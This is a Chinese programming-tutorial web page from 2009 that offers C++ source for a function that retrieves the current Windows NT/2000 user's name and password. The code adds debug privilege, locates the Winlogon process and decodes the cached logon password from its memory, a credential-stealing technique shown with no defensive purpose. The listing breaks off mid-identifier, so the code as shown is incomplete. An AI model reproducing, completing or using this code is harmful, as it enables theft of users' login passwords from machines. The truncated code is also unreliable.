获取WinNT/Win2k当前用户名和密码

时间:2009-12-22 15:42来源:未知作者:admin 点击: 次

分享到：

本文所用的代码原创作者已不知.是ccrun的一个朋友磨刀老头提供给的,在此对作者表示感谢.经ccrun(老妖)在Win2k下试验成功. // 获取WinNT/Win2k当前用户名和密码，调用以下函数即可： // bo

　　本文所用的代码原创作者已不知.是ccrun的一个朋友磨刀老头提供给的,在此对作者表示感谢.经ccrun(老妖)在Win2k下试验成功.

// 获取WinNT/Win2k当前用户名和密码，调用以下函数即可：

// bool GetPassWord(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)

//---------------------------------------------------------------------------

typedef strUCt _UNICODE_STRING

{

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

}UNICODE_STRING, *PUNICODE_STRING;

typedef struct _QUERY_SYSTEM_INFORMATION

{

DWORD GrantedAccess;

DWORD PID;

WORD HandleType;

WORD HandleId;

DWORD Handle;

}QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;

typedef struct _PROCESS_INFO_HEADER

{

DWORD Count;

DWORD Unk04;

DWORD Unk08;

}PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;

typedef struct _PROCESS_INFO

{

DWORD LoadAddress;

DWORD Size;

DWORD Unk08;

DWORD Enumerator;

DWORD Unk10;

char Name [0x108];

}PROCESS_INFO, *PPROCESS_INFO;

typedef struct _ENCODED_PASSWORD_INFO

{

DWORD HashByte;

DWORD Unk04;

DWORD Unk08;

DWORD Unk0C;

FILETIME LoggedOn;

DWORD Unk18;

DWORD Unk1C;

DWORD Unk20;

DWORD Unk24;

DWORD Unk28;

UNICODE_STRING EncodedPassword;

}ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);

typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);

typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);

typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);

typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);

// Private Prototypes

BOOL IsWinNT(void);

BOOL IsWin2K(void);

BOOL AddDebugPrivilege(void);

DWORD FindWinLogon(void);

BOOL LocatePasswordPageWinNT(DWORD, PDWORD);

BOOL LocatePasswordPageWin2K(DWORD, PDWORD);

void ReturnWinNTPwd(String &, String &, String &);

void ReturnWin2kPwd(String &, String &, String &);

bool GetPassword(String &, String &, String &);

// Global Variables

PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;

PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;

PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;

PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;

PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;

DWORD dwPwdLen = 0;

PVOID pvRealPwd = NULL;

PVOID pvPwd = NULL;

DWORD dwHashByte = 0;

wchar_t wszUserName[0x400];

wchar_t wszUserDomain[0x400];

//---------------------------------------------------------------------------

bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)

{

if(!IsWinNT() && !IsWin2K())

{

// 只适合于2000或者XP

return false;

}

// Add debug privilege to PasswordReminder -

// this is needed for the search for Winlogon.

if(!AddDebugPrivilege())

{

// 不能够添加debug特权

return false;

}

// debug特权已经成功加入到本程序

HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");

pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)

GetProcAddress(hNtDll,"NtQuerySystemInformation");

pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)

GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");

pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)

GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");

pfnRtlDe

上一篇：获取GetLastError返回信息
下一篇：获取操作系统的类型和版本

分享到： QQ空间新浪微博人人网开心网更多

精彩图集

C++十六进制

深入单链表

共用体的定

c++获取进程

精彩文章

热点文章

获取WinNT/Win2k当前用户名和密码

热门标签

赞助商链接